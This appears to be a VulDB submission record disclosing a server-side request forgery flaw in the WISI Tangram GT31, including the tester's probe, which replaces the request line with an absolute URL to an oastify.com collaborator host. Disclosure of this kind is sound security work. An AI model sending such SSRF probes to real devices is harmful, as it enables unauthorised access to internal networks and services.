| Title | Tangram wisi Control GT31 Server-Side Request Forgery |
|---|
| Description | It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. The payload http://zps398f6qv5y11m4bpcz2bo05rbizanz.oastify.com/ was submitted in the HTTP Request-Line. The application performed an HTTP request to the specified domain. The response from that request was then included in the application's own response.
During the exploitation, it was identified that by replacing the request content from GET / to GET http://zps398f6qv5y11m4bpcz2bo05rbizanz.oastify.com/, DNS resolution and interaction with the collaborator occurred, indicating the possibility of a blind SSRF with out-of-band detection |
|---|
| Source | ⚠️ http://x.x.x.x/data.xmlc?size=1 |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 12/14/2024 23:46 (1 Year ago) |
|---|
| Moderation | 12/27/2024 09:41 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289382 [WISI Tangram GT31 up to 20241214 HTTP Request server-side request forgery] |
|---|
| Points | 17 |
|---|